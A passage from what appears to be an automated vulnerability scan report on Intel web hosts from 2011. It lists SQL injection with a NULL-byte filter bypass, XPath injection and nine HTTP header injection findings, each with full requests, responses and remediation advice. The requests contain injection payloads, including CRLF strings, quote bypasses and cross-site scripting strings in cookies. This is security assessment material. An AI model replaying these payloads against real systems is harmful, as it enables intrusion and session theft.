The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562%00'?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:15:19 GMT
Server: Omniture DC/2.0.0
Content-Length: 462
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562%00''?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:15:19 GMT
Server: Omniture DC/2.0.0
xserver: www652
Content-Length: 0
Content-Type: text/html


2. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The SIP parameter appears to be vulnerable to XPath injection attacks. The payload " was submitted in the SIP parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP11&SN2=LOPMASHUP07A&SN3=LOPMASHUP07B&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword=" HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=328040 t=1296956941185767
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43153
Expires: Sun, 06 Feb 2011 13:49:26 GMT
Date: Sun, 06 Feb 2011 01:50:13 GMT
Connection: close
Content-Length: 158

Error execution Mashup Script : Error filtering data : XPath syntax error at char 50 in {...(lower-case(.),lower-case("...}:
Unmatched quote in expression

3. HTTP header injection  previous  next
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fca4d%0d%0a5ca15ea1dbf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264110fca4d%0d%0a5ca15ea1dbf/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110fca4d
5ca15ea1dbf

Content-Length: 207
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110fca4d
5ca15ea1dbf">he
...[SNIP]...

3.2. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4792a%0d%0a0de4dd1da6c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-2641364792a%0d%0a0de4dd1da6c/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-2641364792a
0de4dd1da6c

Content-Length: 227
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-26413647
...[SNIP]...

3.3. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 225ee%0d%0a86d51e0577b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264138225ee%0d%0a86d51e0577b/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:17 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138225ee
86d51e0577b

Content-Length: 215
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138225ee
86d51e0
...[SNIP]...

3.4. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bdcbc%0d%0a501e00af3ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264171bdcbc%0d%0a501e00af3ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:16 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171bdcbc
501e00af3ac

Content-Length: 205
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171bdcbc
501e00af3ac">here
...[SNIP]...

3.5. http://rss.intel.com/click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d4e32%0d%0a457ea5750ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-182178-c1-264172d4e32%0d%0a457ea5750ac/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:17 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172d4e32
457ea5750ac

Content-Length: 190
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172d4e32
457ea5750ac">here</a>

3.6. http://rss.intel.com/click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e2a8c%0d%0a47f57a11cd1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-264090e2a8c%0d%0a47f57a11cd1/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:19 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090e2a8c
47f57a11cd1

Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2
...[SNIP]...

3.7. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f9a1a%0d%0a9f2d1231440 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-264093f9a1a%0d%0a9f2d1231440/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093f9a1a
9f2d1231440

Content-Length: 217
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093f9a1a
9f2d1
...[SNIP]...

3.8. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d2807%0d%0af84a0e66e75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-264102d2807%0d%0af84a0e66e75/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:19 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102d2807
f84a0e66e75

Content-Length: 207
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102d2807
f84a0e66e75">he
...[SNIP]...

3.9. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7044c%0d%0ad07dd0e1f41 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-2641317044c%0d%0ad07dd0e1f41/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:19 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-2641317044c
d07dd0e1f41

